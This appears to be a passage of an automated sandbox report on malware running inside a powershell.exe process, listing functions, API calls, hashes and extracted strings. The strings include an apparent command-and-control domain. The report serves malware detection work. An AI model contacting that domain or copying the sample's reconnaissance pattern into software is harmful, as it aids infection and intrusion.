Opcode ID: cca2a0e9646a36677d31ab4c24b7cf98448e13d6141620459eb00a4bb6c213af
Instruction ID: 39f5132af5a36400bcb7c0d7529c445ca9c1bb8d10c024f594fdf0402e45049d
Opcode Fuzzy Hash: cca2a0e9646a36677d31ab4c24b7cf98448e13d6141620459eb00a4bb6c213af
Instruction Fuzzy Hash: CF213733F103045FEBA4556A8809B37AFD65BD0711F64C42A9645CF2C5CD71D845C2E1

Analysis Process: powershell.exePID: 5956, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.4%
Total number of Nodes:	193
Total number of Limit Nodes:	15

Executed Functions

Function 00382AE0 Relevance: 199.9, APIs: 3, Strings: 110, Instructions: 2152COMMON

Download Yara Rule

Strings

F, xrefs: 00383A5F
D, xrefs: 003847A2
^, xrefs: 00383E07
], xrefs: 00383E1F
N, xrefs: 00382CC8
G, xrefs: 003848D8
r, xrefs: 003837AD
G, xrefs: 00383A57
., xrefs: 00383469
G, xrefs: 00384A85
\, xrefs: 00383E17
), xrefs: 00383441
V, xrefs: 00383DC7
p, xrefs: 003832AE
f, xrefs: 00384316
d, xrefs: 00384326
o, xrefs: 00383926
y, xrefs: 00383F91
R, xrefs: 00383DE7
`, xrefs: 003839E1
x, xrefs: 00383F8C
], xrefs: 00383F87
~, xrefs: 00384356
/, xrefs: 00383471
H, xrefs: 00382D2F
J, xrefs: 00383FF2
), xrefs: 0038440E
D, xrefs: 00384B77
7, xrefs: 00382E72
9, xrefs: 003847BA
G, xrefs: 00384B7C
9, xrefs: 0038461D
b, xrefs: 00384336
Xov, xrefs: 00383AEC, 003846B0, 00384846, 00384962, 00384B04, 00384BFF
{, xrefs: 00383775
y, xrefs: 00382FB2
8, xrefs: 0038391E
D, xrefs: 00383A4F
K, xrefs: 00383FE2
D, xrefs: 00384605
F, xrefs: 003843BE
9, xrefs: 003830C1
x, xrefs: 00384386
S, xrefs: 0038319C
[, xrefs: 00383685
P, xrefs: 00383DF7
r, xrefs: 00383609
s, xrefs: 0038360E
9, xrefs: 00384B86
h, xrefs: 00383DB7
%, xrefs: 00383421
p, xrefs: 00384142
f, xrefs: 00384102
;, xrefs: 0038447E
w, xrefs: 00383B9B
i, xrefs: 003840B2
D, xrefs: 003848D3
|, xrefs: 00384366
p, xrefs: 003843C6
U, xrefs: 003843AE
`, xrefs: 00384346
D, xrefs: 00384A80
j, xrefs: 00383DA7
D, xrefs: 00384002
-, xrefs: 00383461
u, xrefs: 00383785
D, xrefs: 00384565
', xrefs: 00383431
#, xrefs: 00382F2A
t, xrefs: 003843A6
W, xrefs: 00383966
r, xrefs: 003843B6
z, xrefs: 00384376
F, xrefs: 003848DD
q, xrefs: 00383604
V, xrefs: 00384032
w, xrefs: 003832A9
G, xrefs: 003847AA
9, xrefs: 003848E2
i, xrefs: 00383936
k, xrefs: 00383946
9, xrefs: 00384A8F
T, xrefs: 00383DD7
q, xrefs: 003837A5
9, xrefs: 00383A67
v, xrefs: 00384396
U, xrefs: 0038368F
_, xrefs: 00382CC3
m, xrefs: 00384112
w, xrefs: 00383795
~, xrefs: 00383F96
Z, xrefs: 00383E27
U, xrefs: 00384022
!, xrefs: 00383401
+, xrefs: 00383451
V, xrefs: 0038395E
[, xrefs: 00382BAB
D, xrefs: 003849DA
G, xrefs: 0038460D
F, xrefs: 00384A8A
F, xrefs: 00384615
T, xrefs: 0038368A
s, xrefs: 003837B5
F, xrefs: 00383680
F, xrefs: 003847B2
F, xrefs: 00384B81
U, xrefs: 00383956
v, xrefs: 00384132
[, xrefs: 00382E7C
#, xrefs: 00383411

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID:
String ID: !$#$#$%$'$)$)$+$-$.$/$7$8$9$9$9$9$9$9$9$;$D$D$D$D$D$D$D$D$D$F$F$F$F$F$F$F$F$G$G$G$G$G$G$H$J$K$N$P$R$S$T$T$U$U$U$U$V$V$V$W$Xov$Z$[$[$[$\$]$]$^$_$`$`$b$d$f$f$h$i$i$j$k$m$o$p$p$p$q$q$r$r$r$s$s$t$u$v$v$w$w$w$x$x$y$y$z${$|$~$~
API String ID: 0-1322636185
Opcode ID: c2d522dffdd5e6549540950ae7a0b35281b09f1c0cd4b30aad118b7135e49f27
Instruction ID: 9fe742c8bdae5ececa7eb43565f2fac5425b082e48f4d4799ebc16ac959a1b57
Opcode Fuzzy Hash: c2d522dffdd5e6549540950ae7a0b35281b09f1c0cd4b30aad118b7135e49f27
Instruction Fuzzy Hash: 0613DE7150C7D08AD336AB38884439FBBD16BD6324F198AADE5E98B3C2D7788905C753

Function 003A8810 Relevance: 35.8, APIs: 12, Strings: 8, Instructions: 801
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(003B368C,00000000,00000001,003B367C,00000000), ref: 003A8A6B
SysAllocString.OLEAUT32(5DEB63D0), ref: 003A8B1A
CoSetProxyBlanket.COMBASE(80B0E407,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003A8B58
SysAllocString.OLEAUT32(86D080D8), ref: 003A8BF1
SysAllocString.OLEAUT32(87438537), ref: 003A8C8B
VariantInit.OLEAUT32(FEF9F8F3), ref: 003A8CF7

Strings

TU, xrefs: 003A8C59
:, xrefs: 003A896A
QS, xrefs: 003A8C51
$z3, xrefs: 003A8A30
NO, xrefs: 003A8AA1
jQG, xrefs: 003A9134
*+, xrefs: 003A8D31
WQ, xrefs: 003A8A91

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: $z3$*+$:$NO$TU$jQG$QS$WQ
API String ID: 65563702-3151449071
Opcode ID: 00d48cee76c334d205f5b61410c6c0bfb4ac2826a7a343f9f34b4fd59747b032
Instruction ID: 39c43aa14d4923d833ddbf466430eff6eb53e0dbc7204dd96f0842dbc79ccaec
Opcode Fuzzy Hash: 00d48cee76c334d205f5b61410c6c0bfb4ac2826a7a343f9f34b4fd59747b032
Instruction Fuzzy Hash: C0422771A183518FD314CF68C8817ABBBE6EFC5314F198A2DE9959B380DB74D805CB82

Function 0037CF4B Relevance: 18.6, APIs: 2, Strings: 10, Instructions: 593
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0037CF57
CoUninitialize.COMBASE ref: 0037D368

Strings

'T0Z, xrefs: 0037D5AB
imbibelubmbe.click, xrefs: 0037D34F, 0037D75F
NO, xrefs: 0037D6D7
5D1J, xrefs: 0037D57F
eXy^, xrefs: 0037D5B6
;L`R, xrefs: 0037D595
2C%M, xrefs: 0037D6CF
>\-b, xrefs: 0037D5C1
qG!A, xrefs: 0037D345, 0037D34E
.H;N, xrefs: 0037D58A

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: Uninitialize
String ID: 'T0Z$.H;N$2C%M$5D1J$;L`R$>\-b$NO$eXy^$imbibelubmbe.click$qG!A
API String ID: 3861434553-1212486564
Opcode ID: 74614e2b6a141ae05f5f74011b4505902c678f0f2b3b5d71593dc6c9937393ab
Instruction ID: 4376c06c4860ca806a2f8e4a4b5779570ac33f411475131e0d8272404d0e2099
Opcode Fuzzy Hash: 74614e2b6a141ae05f5f74011b4505902c678f0f2b3b5d71593dc6c9937393ab
Instruction Fuzzy Hash: 8712F0B190D3D08BD336CF2988A439BBFE1AF97704F2A8A5CD5C95B241D7790806CB52

Function 003953D0 Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00395468
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 003954F5

Strings

tu, xrefs: 003959DC
B1SN, xrefs: 00395570
TF, xrefs: 003956EB
CC, xrefs: 003956FB
V1SN, xrefs: 003955E3
*+, xrefs: 00395416

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *+$B1SN$CC$TF$V1SN$tu
API String ID: 237503144-2259541044
Opcode ID: c03f7fe97be319c260a2f12c91bd2f0b2d54c79bdde90a9873d4ac5401dc08a0
Instruction ID: 76c0b134325733bf5243bd41b105366030348cd25c1cc1c4bc31d886bcf70727
Opcode Fuzzy Hash: c03f7fe97be319c260a2f12c91bd2f0b2d54c79bdde90a9873d4ac5401dc08a0
Instruction Fuzzy Hash: BCE1FCB460C3419FD711DF68D88162BBBE5FBD2354F448A2CF5D98B291E7788906CB82

Function 0038A5C1 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DGF9, xrefs: 0038A5F0, 0038A616
UIQR, xrefs: 0038A738
]AYZ, xrefs: 0038A722
Xov, xrefs: 0038A6CE

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID:
String ID: DGF9$UIQR$Xov$]AYZ
API String ID: 0-1615133906
Opcode ID: d428bc7118920516e93f5d05d47bd37cbe4012d33dae76146b275f799bb20d07
Instruction ID: 172cd9fa2465e1a035473243ffbfbd30dfc402a6ae398f0c24e2ec59feb83bb9
Opcode Fuzzy Hash: d428bc7118920516e93f5d05d47bd37cbe4012d33dae76146b275f799bb20d07
Instruction Fuzzy Hash: 8AA127B29087418FE726DF28D84176FB7E2ABD4304F19866DE5C987241EB34DC06CB92

Function 00378710 Relevance: 7.7, APIs: 5, Instructions: 198
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00378734
GetCurrentThreadId.KERNEL32 ref: 0037873E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00378810
GetForegroundWindow.USER32 ref: 003788B1
ExitProcess.KERNEL32 ref: 00378988

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 4365e8bac38217e021e7da0fc6b9cb34b7306fcf5cce00b28cca6c8aa1de7828
Instruction ID: ea10defdc49b161b4336bccc9acdabd2b8d7300ecb4ca4d94ac5afc2994cfdbd
Opcode Fuzzy Hash: 4365e8bac38217e021e7da0fc6b9cb34b7306fcf5cce00b28cca6c8aa1de7828
Instruction Fuzzy Hash: 41517E73B043154BD3186FB88C46355B6DA9BD9310F1EC63DA598DB391EA78CC028381

Function 0039DBBA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0039DFEE

Strings

J>I1, xrefs: 0039E14A

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: J>I1
API String ID: 3960555810-2340248489
Opcode ID: 35cfa91f0d71e880d006a91732884de8c0e832e70474c0a1a752b7a8f9fa1b38
Instruction ID: 3f6324394f9a81e13554d5f0b612095c49e00c040f9127ee8459c7f8c27390af
Opcode Fuzzy Hash: 35cfa91f0d71e880d006a91732884de8c0e832e70474c0a1a752b7a8f9fa1b38
Instruction Fuzzy Hash: D291E47050C7D18BDB2ACF3A845076BBFE1AF97304F284A5DE1E68B292D7758805CB52

Function 0039DF11 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0039DFEE

Strings

J>I1, xrefs: 0039E14A

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: J>I1
API String ID: 3960555810-2340248489
Opcode ID: 1595810cf311e1c2f60e69106f361b857f2c043d81cc97362378746e490bf9bc
Instruction ID: 652afd8ab8bc47bc2ea1462ee2aff11bb42b2a3c0372e7c099804d1cea6cafc9
Opcode Fuzzy Hash: 1595810cf311e1c2f60e69106f361b857f2c043d81cc97362378746e490bf9bc
Instruction Fuzzy Hash: 3A81D17050C7908BDB2ACF39846176BBFE1AF97304F184A6DE1D68B292D7768805CB52

Function 003A0FA9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 003A104F

Strings

0, xrefs: 003A1262

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 273352fd448c53d3fa49b4eb3ee75393f0bf68a7ae3a2b775f1377bbbbf8a546
Instruction ID: 45d0456f4cc406bbc8ff6e3bc82e07fbc08c440a61f34fb92f99e06d8bdb361c
Opcode Fuzzy Hash: 273352fd448c53d3fa49b4eb3ee75393f0bf68a7ae3a2b775f1377bbbbf8a546
Instruction Fuzzy Hash: 6FA12961108BC1CED316CB3D8888B527ED15B66328F0E82DDD1A98F7E3D6B9D505C726

Function 003ADCD0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(003B0DFD,00000002,00000018,?,?,00000018,?,?,?), ref: 003ADCFE

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 003A272F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 003A278B

Strings

0, xrefs: 003A291A

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 24c8bd34cd28330f9f86f30b5a3344b8b9d050627f470fb8acc4c91e5386a0b7
Instruction ID: d26c5b25d3771b43730e5c3d5e67e094eafe2f60be027bbdfbd305e3492e0a58
Opcode Fuzzy Hash: 24c8bd34cd28330f9f86f30b5a3344b8b9d050627f470fb8acc4c91e5386a0b7
Instruction Fuzzy Hash: 84811720108BC28ED326CB3D8998A057F916B6B224F0A87DCD0EA4F7F7D365D506C766

Function 003A054B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 003A0551

Strings

0, xrefs: 003A0729

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: FreeString
String ID: 0
API String ID: 3341692771-4108050209
Opcode ID: 76923ed156b92b6e4a7c09ab8fc95f8aee5a05e3d74795f431cf0e87a2c5c976
Instruction ID: df8aed883f697bb7e7ae4bb000b8e5731f716ef789d6fbfe8fb3f885bdf10fa0
Opcode Fuzzy Hash: 76923ed156b92b6e4a7c09ab8fc95f8aee5a05e3d74795f431cf0e87a2c5c976
Instruction Fuzzy Hash: 4981D4601087C0CEE356CB29C488B527FD16B66308F4A85DDC1994F7A3D7BADA09C766

Function 0037CA45 Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0037CA57
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0037CA72

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: d126f946fb3f589778cf566338517c3cb5e57ef7c2ac54ea5edd77eadd46dbfd
Instruction ID: fa536fd18897150435a563c10c40ff0796ca0c44c1768c4c61f75a9dae3a5d8f
Opcode Fuzzy Hash: d126f946fb3f589778cf566338517c3cb5e57ef7c2ac54ea5edd77eadd46dbfd
Instruction Fuzzy Hash: 34F0F8367C87207AFA7E9A249D27F257225AB05F29F364308BB123E6D986D03601858C

Function 003ADE6F Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 003ADEE1

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 482a0afa2992911e2bd3069a3f033cb39ba982d48d3028848ff93f2c3f0e7942
Instruction ID: 8d7836d9cdd4825c91aa346bec339f70563d49333857e74300e0271ff2d622eb
Opcode Fuzzy Hash: 482a0afa2992911e2bd3069a3f033cb39ba982d48d3028848ff93f2c3f0e7942
Instruction Fuzzy Hash: 2F01F5B7F115500BDB069B399C466AA37D7D7C2729B1E8A39D646CBB05E979C80383C0

Function 003A6F18 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 003A6F45

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: cb5b11f17ba36fbf85b9b16edeccae2eba9324013c5edbbe4bb6c0c981b87fb4
Instruction ID: 03ff75c504142e5f1a64c0b5ae268386fd92bc84d7359e9eb6b6acc593325093
Opcode Fuzzy Hash: cb5b11f17ba36fbf85b9b16edeccae2eba9324013c5edbbe4bb6c0c981b87fb4
Instruction Fuzzy Hash: CC113A76D042B68FCF128F7C8C013AE7FA15B5B320F1D86A8C9D567389D63499418791

Function 003A22BF Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 003A2304

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 66090a4f5cff68bda153f18809656d4b32858f9ef34989bc2684a829bc59d8d1
Instruction ID: f4873620f597f2dfe959b22eb03771dff0dea93bfd956b8f399e64ad8300b484
Opcode Fuzzy Hash: 66090a4f5cff68bda153f18809656d4b32858f9ef34989bc2684a829bc59d8d1
Instruction Fuzzy Hash: 37F067B45097418FD315DF28D5A8757BBF4FB88308F008A0DE5958B290CBB5A648CF82

Function 003A1BF2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 003A1C3A

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_370000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c9faafcbc27ac5672fc5186e1d7bcafca9cd3c8d4418abec3a583b78004115e1
Instruction ID: f2640fe03d766c0b64b8522addde95c736e43d156d55d326378459d2f7432f29
Opcode Fuzzy Hash: c9faafcbc27ac5672fc5186e1d7bcafca9cd3c8d4418abec3a583b78004115e1
Instruction Fuzzy Hash: 38F067B45187018FD315DF69D5A471ABBF8EB84304F00991DE595CB390C775A649CF82

Function 003ADED3 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 003ADEE1

Memory Dump Source

Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true

Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
